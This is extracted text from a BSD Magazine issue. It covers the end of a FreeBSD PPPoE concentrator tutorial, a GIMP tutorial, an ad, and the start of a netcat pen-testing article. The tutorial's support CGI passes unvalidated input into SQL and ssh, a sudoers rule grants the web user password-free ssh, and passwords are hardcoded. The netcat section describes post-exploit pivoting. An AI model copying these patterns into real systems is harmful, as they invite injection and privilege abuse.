$radius "select radcheck.username from radcheck, usergroup where usergroup.username=radcheck.username and radcheck.bloqueado='1' and usergroup.groupname!='';" > /tmp/drop_blocked

while read line
do
    # drop via ssh: the remote tool drops the customer in whichever concentrator of the pppoe group it is connected to
    # (remote host and script name partly unreadable in the scan)
    /usr/bin/ssh -i /root/.ssh/id_rsa <radius-host> /root/scripts/drop.sh $line < /dev/null
    # shutdown ng, drops only customers that are connected on this concentrator
    # /root/scripts/drop_force $line
    echo "$line - dropped!"
    sleep 5
done < /tmp/drop_blocked
#eof
Listing 32.

# vi /root/scripts/drop_force

#!/bin/sh
#written by tfgoncalves (at) connectionlost (dot) com(dot)br
#1414503716

if [ -z "$1" ]
then
    echo "Usage: $0 {customer}"
    exit 1
fi

# database host unreadable in the scan: replace <db-host> with your RADIUS database server
radius="/usr/local/bin/mysql -u userradius -h <db-host> radius -psenharadius -s -N -e"

ip=`$radius "select value from radreply where attribute='Framed-IP-Address' and username='$1';"`

if [ -z "$ip" ]
then
    echo "Invalid customer!"
    exit 0
else
    # netgraph interface of the customer's host route (exact match on the destination column)
    ng=$(netstat -rn | awk -v ip="$ip" '$1 == ip {print $6}')
    if [ -z "$ng" ]
    then
        echo "Customer not connected on `uname -n`!"
        exit 0
    else
        echo $ng":"
        $radius "update radacct set acctstoptime=now() where username='$1' and acctstoptime is null;" 2> /dev/null
        /usr/sbin/ngctl shutdown $ng:
        echo "Customer "$ng" dropped!"
    fi
fi
#eof
Listing 33.

# touch /usr/local/etc/rc.d/cpu_affinity
# chmod 755 /usr/local/etc/rc.d/cpu_affinity
# cat /usr/local/etc/rc.d/cpu_affinity

#!/bin/sh
#written by tfgoncalves (at) connectionlost (dot) com(dot)br
#1414503716
# REQUIRE: LOGIN
#
# Add the following lines to /etc/rc.conf to enable cpu_affinity
# cpu_affinity_enable (bool): Set to "NO" by default.
# Set it to "YES" to enable cpu_affinity

. /etc/rc.subr

name=cpu_affinity
rcvar=${name}_enable
load_rc_config $name
start_cmd="${name}_start"
stop_cmd="${name}_stop"
: ${cpu_affinity_enable:="NO"}

cpu_affinity_start()
{
    # pin each NIC queue interrupt (IRQ number after -x) to one core
    /usr/bin/cpuset -l 0 -x 259
    /usr/bin/cpuset -l 1 -x 268
    /usr/bin/cpuset -l 2 -x 277
    /usr/bin/cpuset -l 3 -x 286
    /usr/bin/cpuset -l 0 -x 295
    /usr/bin/cpuset -l 1 -x 296
    /usr/bin/cpuset -l 2 -x 297
    /usr/bin/cpuset -l 3 -x 298
    /usr/bin/cpuset -l 4 -x 299
    /usr/bin/cpuset -l 5 -x 300
    /usr/bin/cpuset -l 6 -x 301
    /usr/bin/cpuset -l 7 -x 302
    # netisr threads can be found with:
    # procstat -at | awk '/swi1: netisr/ {print $2}'
}

cpu_affinity_stop()
{
    # give the interrupts back to all cores
    /usr/bin/cpuset -l all -x 259
    /usr/bin/cpuset -l all -x 268
    /usr/bin/cpuset -l all -x 277
    /usr/bin/cpuset -l all -x 286
    /usr/bin/cpuset -l all -x 295
    /usr/bin/cpuset -l all -x 296
    /usr/bin/cpuset -l all -x 297
    /usr/bin/cpuset -l all -x 298
    /usr/bin/cpuset -l all -x 299
    /usr/bin/cpuset -l all -x 300
    /usr/bin/cpuset -l all -x 301
    /usr/bin/cpuset -l all -x 302
}

run_rc_command "$1"
#eof

Permissions to be executable:

# chmod +x /usr/local/etc/rc.d/cpu_affinity
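The cpu_affinity script above pins a fixed list of IRQ numbers, which only match the box it was written on. As an added example that is not part of the article's scripts, the block below derives the same cpuset(1) calls from vmstat -i output, spreading a NIC's queue interrupts round-robin over a given number of cores; the function names and the vmstat sample are constructed for this example.

```sh
#!/bin/sh
# Added example (not the article's rc script): build the cpuset(1) calls that
# Listing 33 hardcodes from `vmstat -i` output, so the pinning follows the
# queue IRQs a NIC actually received on this machine.

# Constructed sample in `vmstat -i` format (not a capture from the article).
SAMPLE_VMSTAT='interrupt                          total       rate
irq16: ehci0                        1234          1
irq259: igb4:que 0                 99887        120
irq260: igb4:que 1                 88776        110
irq261: igb4:que 2                 77665        100
irq262: igb4:que 3                 66554         90
irq263: igb4:link                      5          0
irq268: igb3:que 0                 55443         80
irq269: igb3:que 1                 44332         70
cpu0:timer                       1000000       1000'

# queue_irqs NIC: read vmstat -i text on stdin and print NIC's queue IRQ
# numbers, one per line. Link-state interrupts and other devices are skipped.
queue_irqs() {
    awk -v nic="$1" '
        $1 ~ /^irq[0-9]+:$/ && $2 == (nic ":que") {
            sub(/^irq/, "", $1); sub(/:$/, "", $1); print $1
        }'
}

# affinity_plan NIC NCPU [FIRST]: one "cpuset -l CPU -x IRQ" line per queue
# IRQ, round-robin over NCPU cores starting at core FIRST (default 0).
# The output is a plan; piping it to sh applies it (root), as the rc start does.
affinity_plan() {
    queue_irqs "$1" | awk -v ncpu="$2" -v first="${3:-0}" '
        { printf "/usr/bin/cpuset -l %d -x %s\n", (first + NR - 1) % ncpu, $1 }'
}

# affinity_release NIC: the matching "stop" plan, returning the IRQs to all cores.
affinity_release() {
    queue_irqs "$1" | awk '{ print "/usr/bin/cpuset -l all -x " $1 }'
}

# Stand-alone demo on the constructed sample: igb4's four queues over 4 cores.
echo "$SAMPLE_VMSTAT" | affinity_plan igb4 4
```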
-> If you are using Dual-Stack and not using NAT. Enable it via netgraph to export flows from the external interface. Create the rc for nf_export: Listing 28. Consider igb4 as the external interface and 203.0.113.15:700 as the ip:port of the NetFlow collector. Enable in rc.conf:

nf_export_enable="YES"

To start NetFlow export:

# /usr/local/etc/rc.d/nf_export start

To stop NetFlow export:

# /usr/local/etc/rc.d/nf_export stop

-> If you are using Dual-Stack and using NAT. Create the directory for the control and pid files of softflowd:

# mkdir -p /usr/local/etc/mpd5/netflow

Add this line in the ppp-up script:

/usr/local/sbin/softflowd -i $1 -n 186.250.56.16:670 -v 9 -c /usr/local/etc/mpd5/netflow/$1.ctl &

# vi /root/scripts/ppp-up

if [ "$2" = "inet" ]
then
    c_ip=$4
    c_ip_first=`echo $4 | cut -d "." -f 1`
    /usr/local/sbin/softflowd -i $1 -n 203.0.113.15:700 -v 9 -c /usr/local/etc/mpd5/netflow/$1.ctl &
fi

And add this line in the ppp-down script:

/usr/local/sbin/softflowctl -c /usr/local/etc/mpd5/netflow/$1.ctl shutdown

# vi /root/scripts/ppp-down

if [ "$2" = "inet" ]
then
    c_ip=$4
Listing 34.

# mkdir -p /usr/local/www/nginx/sst
# vi /usr/local/www/nginx/sst/sst.cgi

#!/bin/sh
#written by tfgoncalves (at) connectionlost (dot) com(dot)br
#1414503716

# database host unreadable in the scan: replace <db-host> with your RADIUS database server
radius="/usr/local/bin/mysql -u userradius -h <db-host> radius -psenharadius -s -N -e"

#change the pass here
pass="mudar321!"

# the "New query" form that closes every answer
new_query()
{
    echo '<form method="link" action="sst">'
    echo '<input type="submit" value="New query">'
    echo '</form>'
}

echo "Content-type: text/html"
echo ""
echo '<html>'
echo '<head>'
echo '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">'
echo '<title>SST</title>'
echo '</head>'
echo '<body>'
echo '<center>Support system (SST)</center>'
echo "<form method=GET action=\"${SCRIPT_NAME}\">" \
  '<table nowrap>' \
  '<tr><td>Client: </TD><TD><input type="text" name="cliente" size=50></td></tr>' \
  '</table>'
echo '<input type="radio" name="option" value="1"> Client informations.' \
  '<input type="radio" name="option" value="2"> Drop client.<br>' \
  '<input type="radio" name="option" value="3"> Drop client ( forced ).<br>' \
  '<input type="radio" name="option" value="4"> Total connected clients.<br>'
echo '<hr>'
echo '<input type="radio" name="option" value="6"> Ping.<br>'
echo '<table nowrap>' \
  '<tr><td>IP: </TD><TD><input type="text" name="ip" size=20></td></tr>' \
  '</table>'
echo '<hr>'
echo '<input type="radio" name="option" value="5"> Change speed.<br>'
echo '<table nowrap>' \
  '<tr><td>Download speed (kb): </TD><TD><input type="text" name="vdown" size=20></td></tr>' \
  '<tr><td>Upload speed (kb): </TD><TD><input type="text" name="vup" size=20></td></tr>' \
  '<tr><td>Authorization key: </TD><TD><input type="text" name="key" size=20></td></tr>' \
  '</table>'
echo '<br><input type="submit" value="Send">' \
  '<input type="reset" value="Reset"></form>'

if [ "$REQUEST_METHOD" != "GET" ]; then
    echo "<hr>$SCRIPT_NAME:" \
      "<br>Usage error, cannot complete request, REQUEST_METHOD!=GET." \
      "<br>Check your FORM declaration and be sure to use METHOD=\"GET\".<hr>"
    exit 1
fi

if [ -z "$QUERY_STRING" ]; then
    exit 0
else
    # pick each field out of the query string; only %20 is decoded
    XX=`echo "$QUERY_STRING" | sed -n 's/^.*cliente=\([^&]*\).*$/\1/p' | sed "s/%20/ /g"`
    ZZ=`echo "$QUERY_STRING" | sed -n 's/^.*option=\([^&]*\).*$/\1/p' | sed "s/%20/ /g"`
    WW=`echo "$QUERY_STRING" | sed -n 's/^.*vdown=\([^&]*\).*$/\1/p' | sed "s/%20/ /g"`
    QQ=`echo "$QUERY_STRING" | sed -n 's/^.*vup=\([^&]*\).*$/\1/p' | sed "s/%20/ /g"`
    SS=`echo "$QUERY_STRING" | sed -n 's/^.*key=\([^&]*\).*$/\1/p' | sed "s/%20/ /g"`
    II=`echo "$QUERY_STRING" | sed -n 's/^.*ip=\([^&]*\).*$/\1/p' | sed "s/%20/ /g"`

    if [ -z "$ZZ" ]
    then
        echo "<hr> No option selected. <hr>"
        new_query
        exit 0
    fi

    if [ "$ZZ" = 6 ]
    then
        if [ -z "$II" ]
        then
            echo "<hr> None entered IP. <hr>"
            new_query
            exit 0
        fi
        # IPv4 shape check (the original test is unreadable in the scan)
        if echo "$II" | grep -Eq '^[0-9]{1,3}(\.[0-9]{1,3}){3}$'
        then
            for i in 1 2 3 4
            do
                if [ `echo $II | cut -d "." -f $i` -gt 255 ]
                then
                    echo "<hr> Invalid IP. <hr>"
                    new_query
                    exit 0
                fi
            done
            ping=$(ping -c 10 $II)
            echo "<hr>"
            echo "$ping" | sed 's/$/<br>/'
            echo "<hr>"
            new_query
            exit 0
        else
            echo "<hr> Invalid IP. <hr>"
            new_query
            exit 0
        fi
    fi

    if [ "$ZZ" = 4 ]
    then
        total=$(ifconfig -l | tr ' ' '\n' | grep -c '^ng[0-9]')
        echo "<hr> Total connected clients on `uname -n`: "$total" <hr>"
        new_query
        exit 0
    fi

    if [ -z "$XX" ]
    then
        echo "<hr> No customer entered. <hr>"
        new_query
        exit 0
    fi

    if [ "$ZZ" = 1 ]
    then
        c_user=`$radius "select username from radcheck where username='$XX' limit 1;" 2> /dev/null`
        if [ "`echo $XX | tr '[:upper:]' '[:lower:]'`" = "`echo $c_user | tr '[:upper:]' '[:lower:]'`" ]
        then
            c_ip=`$radius "select value from radreply where username='$c_user' and attribute='Framed-IP-Address' limit 1;" 2> /dev/null`
            if [ -z "$c_ip" ]
            then
                c_ip=`$radius "select framedipaddress from radippool where username='$c_user' ORDER BY expiry_time DESC limit 1;" 2> /dev/null`
                c_ip_first=`echo $c_ip | cut -d "." -f 1`
                if [ "$c_ip_first" = 10 ]
                then
                    c_ip_tipo="Dynamic Private"
                else
                    c_ip_tipo="Dynamic Public"
                fi
            else
                c_ip_first=`echo $c_ip | cut -d "." -f 1`
                if [ "$c_ip_first" = 10 ]
                then
                    c_ip_tipo="Private Fixed"
                else
                    c_ip_tipo="Public Fixed"
                fi
            fi
        else
            echo "<hr> Customer invalid. <hr>"
            new_query
            exit 0
        fi

        c_plano=`$radius "select groupname from usergroup where username='$c_user' limit 1;" 2> /dev/null`
        c_bloqueado=`$radius "select bloqueado from radcheck where attribute='Cleartext-Password' and UserName='$c_user';" 2> /dev/null`
        if [ -z "$c_bloqueado" ]
        then
            c_bloqueado=`$radius "select bloqueado from radcheck where attribute='Password' and UserName='$c_user';" 2> /dev/null`
        fi
        if [ "$c_bloqueado" = 0 ]
        then
            c_bloqueado="No"
        else
            c_bloqueado="Yes"
        fi
        if [ -z "$c_ip" ]
        then
            echo "<hr> Customer without IP. <hr>"
            new_query
            exit 0
        fi
        echo "<hr> Customer: $c_user - IP: $c_ip ($c_ip_tipo) - Product: $c_plano - Blocked: $c_bloqueado. <hr>"
    fi

    if [ "$ZZ" = 2 ]
    then
        c_user=`$radius "select username from radcheck where username='$XX' limit 1;" 2> /dev/null`
        if [ "`echo $XX | tr '[:upper:]' '[:lower:]'`" = "`echo $c_user | tr '[:upper:]' '[:lower:]'`" ]
        then
            # remote host and script name partly unreadable in the scan
            sudo ssh -i /root/.ssh/id_rsa <radius-host> /root/scripts/drop.sh $XX > /dev/null
            $radius "update radacct set acctstoptime=now() where acctstoptime is null and username='$XX';" 2> /dev/null
            echo "<hr> Customer "$XX" dropped. <hr>"
            new_query
            exit 0
        else
            echo "<hr> Customer invalid. <hr>"
            new_query
            exit 0
        fi
    fi

    if [ "$ZZ" = 3 ]
    then
        c_user=`$radius "select username from radcheck where username='$XX' limit 1;" 2> /dev/null`
        if [ "`echo $XX | tr '[:upper:]' '[:lower:]'`" = "`echo $c_user | tr '[:upper:]' '[:lower:]'`" ]
        then
            /root/scripts/drop_force $XX 2> /dev/null
            echo "<hr> Customer "$XX" dropped. <hr>"
            new_query
            exit 0
        else
            echo "<hr> Customer invalid. <hr>"
            new_query
            exit 0
        fi
    fi

    if [ "$ZZ" = 5 ]
    then
        if [ "$SS" = "$pass" ]
        then
            c_user=`$radius "select username from radcheck where username='$XX' limit 1;" 2> /dev/null`
            if [ "`echo $XX | tr '[:upper:]' '[:lower:]'`" = "`echo $c_user | tr '[:upper:]' '[:lower:]'`" ]
            then
                # remote host and speed-change script name unreadable in the scan
                sudo ssh -i /root/.ssh/id_rsa <radius-host> /root/scripts/<change-speed-script> $XX $WW $QQ > /dev/null
                echo "<hr> Customer "$XX" with speed changed to "$WW"kb download and "$QQ"kb upload. <hr>"
                echo "Customer "$XX" with speed changed to "$WW"kb download and "$QQ"kb upload the date `date`." >> /tmp/sst_log
                echo "Customer "$XX" with speed changed to "$WW"kb download and "$QQ"kb upload the date `date`." >> /var/log/messages
                new_query
                exit 0
            else
                echo "<hr> Customer invalid. <hr>"
                new_query
                exit 0
            fi
        else
            echo "<hr> Invalid Password, this event will be logged for security reasons. <hr>"
            echo "Attempt to access invalid, password "$SS" the date `date`." >> /tmp/sst_log
            echo "Attempt to access invalid, password "$SS" the date `date`." >> /var/log/messages
            new_query
            exit 0
        fi
    fi
    echo '<br>'
fi
new_query
echo '</body>'
echo '</html>'
exit 0
#eof
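The ppp-up and ppp-down hooks (Listings 29 and 30) splice the RADIUS user name and the assigned address into mysql queries and pfctl calls, and sst.cgi (Listing 34) does the same with the cliente, ip, vdown and vup fields of the query string before running ping and ssh. The block below is an added example, not part of the article's scripts: allowlist checks that reject anything but the expected shape before a value reaches a command, plus a dry run of the pf table selection the hooks perform; function names and the sample query strings are constructed for this example.

```sh
#!/bin/sh
# Added example (not from the article): input checks for the values that
# ppp-up/ppp-down and sst.cgi pass on to mysql, pfctl, ping and ssh.

# valid_username NAME: 1-64 chars from [A-Za-z0-9._@-]; quotes, spaces and
# shell/SQL metacharacters fail here instead of reaching the query or ssh line.
valid_username() {
    printf '%s' "$1" | grep -Eq '^[A-Za-z0-9._@-]{1,64}$'
}

# valid_ipv4 ADDR: dotted quad with every octet 0-255. Replaces the per-octet
# "-gt 255" loop in sst.cgi, which also lets "1.2.3" or "a.b.c.d" through.
valid_ipv4() {
    printf '%s' "$1" | grep -Eq '^[0-9]{1,3}(\.[0-9]{1,3}){3}$' || return 1
    oldifs=$IFS
    IFS=.
    set -- $1
    IFS=$oldifs
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# valid_speed KB: plain positive integer for vdown/vup (max 7 digits).
valid_speed() {
    printf '%s' "$1" | grep -Eq '^[1-9][0-9]{0,6}$'
}

# cgi_param QUERY NAME: value of NAME from a GET query string, %20 decoded,
# the same job as the sed chain in sst.cgi but keyed on the whole field name.
cgi_param() {
    printf '%s\n' "$1" | tr '&' '\n' | sed -n "s/^$2=//p" | sed 's/%20/ /g' | head -n 1
}

# pf_tables_for FAMILY ADDR BLOCKED: the pf tables ppp-up adds ADDR to (and
# ppp-down removes it from): BLOQUEADOS/BLOQUEADOS6 when the RADIUS bloqueado
# flag is 1, PRIVADOS for IPv4 inside 10/8, otherwise PUBLICOS/PUBLICOS6.
pf_tables_for() {
    case "$1" in
    inet)
        valid_ipv4 "$2" || return 1
        [ "$3" = 1 ] && echo BLOQUEADOS
        case "$2" in 10.*) echo PRIVADOS ;; *) echo PUBLICOS ;; esac ;;
    inet6)
        case "$2" in *:*) ;; *) return 1 ;; esac
        [ "$3" = 1 ] && echo BLOQUEADOS6
        echo PUBLICOS6 ;;
    *) return 1 ;;
    esac
}

# sst_check QUERY: validate one sst.cgi request before any command runs.
# Prints the reason and returns 1 on rejection, "ok ..." and 0 otherwise.
sst_check() {
    q=$1
    opt=$(cgi_param "$q" option)
    cli=$(cgi_param "$q" cliente)
    case "$opt" in
    1|2|3|5) valid_username "$cli" || { echo "bad cliente: $cli"; return 1; } ;;
    4) ;;
    6) valid_ipv4 "$(cgi_param "$q" ip)" || { echo "bad ip: $(cgi_param "$q" ip)"; return 1; } ;;
    *) echo "bad option: $opt"; return 1 ;;
    esac
    if [ "$opt" = 5 ]; then
        valid_speed "$(cgi_param "$q" vdown)" && valid_speed "$(cgi_param "$q" vup)" \
            || { echo "bad speed"; return 1; }
    fi
    echo "ok option=$opt cliente=$cli"
}

# Stand-alone demo on constructed requests.
sst_check 'cliente=joao.silva&option=1'
sst_check 'cliente=joao silva&option=2' || true
pf_tables_for inet 10.20.30.40 1
```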
    c_ip_first=`echo $4 | cut -d "." -f 1`
    /usr/local/sbin/softflowctl -c /usr/local/etc/mpd5/netflow/$1.ctl shutdown
else
    c_ip6=$4
fi

Consider 203.0.113.15:700 as the ip:port of the NetFlow collector. Create the startup script (Listing 29) and the shutdown script (Listing 30). Permissions to be executable:

# chmod +x /root/scripts/ppp-down

The following script drops, once a day, the customers that have been blocked: Listing 31.

Permissions to be executable:

# chmod +x /root/scripts/drop_blocked

Add it to cron to run daily:

# crontab -e
00 21 * * * /root/scripts/drop_blocked

This script serves to drop the client locally, but in a forced manner: Listing 32.

Permissions to be executable:

# chmod +x /root/scripts/drop_force

I'm using radvd to generate RA and quagga for redistribution. It could be done with rtadvd or dhcpv6; the most

Listing 35.

worker_processes 1;

events {
    worker_connections 1024;
}

http {
    include mime.types;
    default_type application/octet-stream;
    sendfile on;
    client_body_timeout 10;
    client_header_timeout 10;
    keepalive_timeout 10;
    send_timeout 10;
    client_body_buffer_size 8k;
    client_header_buffer_size 1k;
    client_max_body_size 8m;
    large_client_header_buffers 2 1k;

    server {
        listen 0.0.0.0:80;
        listen [::]:80 ipv6only=on;
        server_name localhost;
        server_tokens off;

        location / {
            root /usr/local/www/nginx;
            index index.html index.htm;
        }

        location /sst {
            root /usr/local/www/nginx/sst;
            index sst.cgi;
            rewrite (.*)$ /$1.cgi break;
            fastcgi_pass unix:/var/run/fcgiwrap/fcgiwrap.sock;
            fastcgi_param SCRIPT_FILENAME /usr/local/www/nginx$fastcgi_script_name;
            include fastcgi_params;
            # only the support workstation may reach the cgi
            allow 203.0.113.69/32;
            deny all;
        }

        error_page 500 502 503 504 /50x.html;
        location = /50x.html {
            root /usr/local/www/nginx-dist;
        }
    }

    server {
        listen 203.0.113.5:666;
        server_name valhalla;
        charset utf-8;
        location / {
            proxy_pass http://127.0.0.1:28778;
        }
    }
}
#eof


[Figure 6. nf_traffic: Sat Nov 22 07:40:00 2014, Bits/s any protocol, Fri 12:00 to Sat 06:00. all: 558.7 Mb/s, tcp: 476.9 Mb/s, udp: 81.7 Mb/s, icmp: 40.4 kb/s, other: 753.8 b/s]

Figure 6. nf_traffic


Listing 36.

# cat /root/.log.io/harvester.conf
exports.config = {
  nodeName: "pppoe",
  logStreams: {
    mpd5: [
      "/var/log/mpd5.log"
    ]
  },
  server: {
    host: '0.0.0.0',
    port: 28777
  }
}
#eof

# cat /root/.log.io/log_server.conf
exports.config = {
  host: '0.0.0.0',
  port: 28777
}
#eof

# cat /root/.log.io/web_server.conf
exports.config = {
  host: '0.0.0.0',
  port: 28778,
  /*
  // Enable HTTP Basic Authentication
  auth: {
    user: "admin",
    pass: "1234"
  },
  */
  /*
  // Enable HTTPS/SSL
  ssl: {
    key: '/path/to/privatekey.pem',
    cert: '/path/to/certificate.pem'
  },
  */
  /*
  // Restrict access to websocket (socket.io)
  // Uses socket.io 'origins' syntax
  restrictSocket: '*:*',
  */
  /*
  // Restrict access to http server (express)
  restrictHTTP: [
    "192.168.29.39",
    "10.0.*"
  ]
  */
}
#eof
important thing is that mpd5 provides a link-local connection between client and server. It is not desirable that the irqs keep moving between processor cores, so let's fix them, bearing in mind that this can vary depending on your hardware. Create the rc for cpu_affinity: Listing 33.

Now let's create the cgi script for support: Listing 34. Permissions to be executable:

# chmod +x /usr/local/www/nginx/sst/sst.cgi

Let's configure sudo, otherwise you will have permission issues with nginx when using the SST. Add these lines at the end of the file:

# vi /usr/local/etc/sudoers
User_Alias WEB = www
WEB ALL = NOPASSWD: /usr/bin/ssh

Let's set nginx for the support system, the log system and the informative page for blocked customers. Edit /usr/local/etc/nginx/nginx.conf: Listing 35.
Listing 37.

# touch /usr/local/etc/rc.d/log_io
# chmod 755 /usr/local/etc/rc.d/log_io
# cat /usr/local/etc/rc.d/log_io

#!/bin/sh
#written by tfgoncalves (at) connectionlost (dot) com(dot) br
#1414503716
# REQUIRE: LOGIN
#
# Add the following lines to /etc/rc.conf to enable log.io-server and log.io-harvester at startup
# log_io_enable (bool): Set to "NO" by default.
# Set it to "YES" to enable log.io-server and log.io-harvester

. /etc/rc.subr
name="log_io"
rcvar=log_io_enable
load_rc_config $name
: ${log_io_enable:=NO}
start_cmd="${name}_start"

Create a blocked informative page; it may contain a customer area and other things, creativity is the limit!

# vi /usr/local/www/nginx/index.html
<html>
<head>
<title></title>
</head>
<body>
<p>Customer blocked, contact the Company Lorem Ipsum.</p>
</body>
</html>

Let's configure postfix: edit /etc/mail/aliases, uncomment the root alias and enter your email address to receive important information from your server.

Run the line below so that postfix runs on localhost and starts functioning properly:

stop_cmd="${name}_stop"

log_io_start()
{
    echo "Starting log.io-server."
    /usr/local/bin/log.io-server >/dev/null 2>&1 &
    echo "Starting log.io-harvester."
    /usr/local/bin/log.io-harvester >/dev/null 2>&1 &
}

log_io_stop()
{
    echo "Stopping log.io-server."
    echo "Stopping log.io-harvester."
    /usr/bin/killall node >/dev/null 2>&1
}

run_rc_command "$1"
#eof




[Figure 7. pppoe_en: border routers, core switch (vlan101), RADIUS servers]

Figure 7. pppoe_en


# postconf -e "alias_maps = hash:/etc/mail/aliases" && postconf -e "inet_interfaces = localhost" && rm -rf /etc/mail/aliases.db && newaliases && postalias /etc/mail/aliases

Let's set up log.io: Listing 36. Create the rc for log.io: Listing 37.

Permissions to be executable:

# chmod +x /usr/local/etc/rc.d/log_io

Access your support system -> http://203.0.113.5/sst/sst and the authentication logs -> http://203.0.113.5:666/.
(Figure 7 caption, continued: simple topology for implementation of pppoe concentrator)


If you got this far, your work is accomplished, set to run! For any questions I am available by email: tfgoncalves(at)connectionlost(dot)com(dot)br. The feedback may take time because mail flow here is a little high, but I will reply. Contributions and new ideas are always welcome. bsd r0x!

TIAGO FELIPE GONCALVES
Getting to Grips with the Gimp - Part 9

In the penultimate part in our series on the Gimp we will look at how to create a 3d package for a FreeBSD carton that is print ready.

What you will learn...
- How to manipulate images like a design pro

What you should know...
- General PC administration skills

In this tutorial we will create a realistic 3D object using the perspective tool that could potentially be used for packaging any product. The key to this is accuracy and scaling, as any mismatch will ruin the final image.

Download the images from Table 1.

Table 1. Details and credits

Resource        | URL                                          | Details and credit
FreeBSD website | https://www.freebsd.org/logo/logo-basic.png  | FreeBSD Logo and fonts
CPU core        | http://www.freeimages.com/photo/759887       | Gold roubles: 10 russian gold roubles and CPU by styf22
Power button    | http://www.freeimages.com/photo/675014       | Power Button: Hard drive power button by jmonte
Step 1

Open the CPU image [Figure 1].


Step 2

Rescale the image to 2800px with the constraint disabled [Figure 2].
Step 3

Select Layer — Layer to image size. 
Use the colour picker tool, select a re- 
gion in the core of the CPU and fill the 
right hand side of the expanded image 
[Figure 3]. 


Step 4 

Create a new layer and click back on 
the original layer. Select some CPU 
pins from the lower left hand side us- 
ing the lasso tool, copy the selection 
and paste into the new layer. Tempo- 
rarily reduce the opacity of the layer 
while aligning so you can overlay the 
pins accurately [Figure 4]. 


Step 5 

Open the FreeBSD logo image and 
select and copy the transparent Red 
Daemon sphere. Create a new layer 
in the CPU image and paste the re- 
sult. Click on the scale tool and en- 
sure the constrain is enabled. Scale 
the image to neatly overlay the coin 
[Figure 5, 6]. 


Step 6 

Add a new layer. Hide all the other lay- 
ers. Copy the transparent FreeBSD 
text in black into the new layer. With 
constrain enabled, scale to 1500px 
and anchor the layer. Add a new layer. 
Set the foreground colour to #ff3300, 
select a square bounding box around 
“BSD” and fill with red. Repeat with 
the “Free” text and fill with white. Set 
the layer to Addition. Reveal the other 
layers and move the FreeBSD text to 
the edge of the CPU die. Select Layer 
— Layer to image size [Figure 7]. 
Step 7

Set the resolution of the image to 300 
pixels/in in both axis (Image — Scale). 
Create a new image with the same 
resolution 760 x 3884 pixels. Select 
the light and dark blue from the left 
hand side of the original image using 
the pick tool and set the foreground 
and background accordingly. Switch 
to the new image and use the gradient 
blend tool to fill the new image [Fig- 
ure 8]. 


Step 8 

Scale both the side and front images to 50% constrained. Open the hard drive light image and use the clone tool to remove the symbol engraved on the right hand side. Crop so that the switches are central [Figure 9]. 


Step 9 

Add a new layer to the side image and paste then scale the switches so they line up in the centre of the image. Add "The power to serve" text, adjusting the kerning and size to fit the maximum width. Set the switch layer to Hard light [Figure 10]. 


Step 10 

Merge visible layers on both images. Create a new page with a white background 3000 x 2500 px. Add a guide at 50% of the vertical (Image — Guides by percent). Add a horizontal guide part way down from the top of the page. Create two new layers, copy and paste the side image and front image into separate layers. Add two vertical guides, one aligned against the "P" and one intersecting the "S" [Figure 11]. 
Step 11 

Click on the left hand layer and, using the rectangle selection tool, outline the left hand panel. Click on the perspective tool and align the vertical axis to match the left-hand guide then click on Transform. Anchor the layer. Repeat with the right hand panel and the right hand guide [Figure 12]. 


Step 12 

Merge down the two layers, and add a shadow with 0 x offset and 20 y offset and blur radius. Give the shadow a 40% opacity. Crop and export as required [Figure 13]. 


ROB SOMERVILLE 

Rob Somerville has been passionate about technology since his early teens. A keen advocate of open systems since the mid-eighties, he has worked in many corporate sectors including finance, automotive, airlines, government and media in a variety of roles from technical support, system administrator, developer, systems integrator and IT manager. He has moved on from CP/M and nixie tubes but keeps a soldering iron handy just in case. 


BSD MAGAZINE, GRAPHIC DESIGN, 11/2014 


Great Specials on FreeBSD® & PC-BSD® Merchandise 

PC-BSD 9.1 DVD ..................................................... $29.95 
FreeBSD 9.1 Jewel Case CD Set or FreeBSD 9.1 DVD ................ $39.95 
The PC-BSD 9.0 Users Handbook ..................................... $24.95 
The FreeBSD CD or DVD Bundle ...................................... $99.95 
Inside each CD/DVD Bundle, you'll find: FreeBSD Handbook, 3rd Edition, 
Users Guide; FreeBSD Handbook, 3rd Edition, Admin Guide; FreeBSD 9.1 CD 
or DVD set. 

Give us a call & ask about our SOFTWARE BUNDLES: 1.925.240.6652 

FreeBSD 9.1 Jewel Case CD/DVD ..................................... $39.95 
CD Set Contains: 
Disc 1 Installation Boot LiveCD (i386) 
Disc 2 Essential Packages Xorg (i386) 
Disc 3 Essential Packages, GNOME2 (i386) 
Disc 4 Essential Packages (i386) 

FreeBSD Subscriptions 
Save time and $$$ by subscribing to regular updates of FreeBSD 
FreeBSD Subscription, start with CD 9.1 ........................... $29.95 
FreeBSD Subscription, start with DVD 9.1 .......................... $29.95 
FreeBSD Subscription, start with CD 9.0 ........................... $29.95 
FreeBSD Subscription, start with DVD 9.0 .......................... $29.95 
PC-BSD 9.1 DVD (Isotope Edition) 
PC-BSD Subscription ............................................... $19.95 

The FreeBSD Handbook 
The FreeBSD Handbook, Volume 1 (User Guide) ....................... $39.95 
The FreeBSD Handbook, Volume 2 (Admin Guide) ...................... $39.95 

The FreeBSD Handbook Specials 
The FreeBSD Handbook (Both Volumes) ............................... $59.95 
The FreeBSD Handbook, Both Volumes & FreeBSD 9.1 .................. $79.95 
PC-BSD 9.0 Users Handbook ......................................... $24.95 
The FreeBSD Toolkit DVD ........................................... $39.95 

Apparel: Look Your Professional Best. Stay Warm in Zip Ups & Pullovers. 
T-Shirts: Lots of Styles to Choose From. 
Just Plain Fun: Mousepads & Novelty Horns. 
FreeBSD Mousepad .................................................. $10.00 
FreeBSD & PC-BSD Cap .............................................. $20.00 
BSD Daemon Horns 

For even MORE items visit our website today! www.FreeBSDMall.com 

BSD Magazine, Available Monthly 

100+ Unix Commands 

Pen Testing and Audit. Part 3 

Netcat comes in handy when engaged in a penetration test. In the event that you find a shell, it may not be feasible to upload large amounts of data, but netcat is small (and also exists natively on many UNIX/Linux systems). There is also a port of netcat for Windows, which means that it can be loaded onto a Windows host over a shell obtained through an exploit. 

Once on the internal host, you can extend what you have done by scanning the internal network, INSIDE the firewall. 


Netcat - the tester's best friend 

Sending to and from separate hosts is possible. The idea here is to have netcat set up as a listener on the host that is collecting the data and for it to be running on a host that is spoofing the source address. The "-s" (local source address) option and the "-g" source-routing hop point option add to this ability (loose source routing is dropped by nearly every modern router, so "-g" rarely achieves anything today). 

The "-i N" option (delay interval) sets a buffered send mode that sends one line every N seconds; "-w N" is the timeout for connects and final network reads. Another option that can be considered is "-o file", which writes a hexdump of transmitted and received data to the specified file. 


Vulnerability Scanning with Netcat 

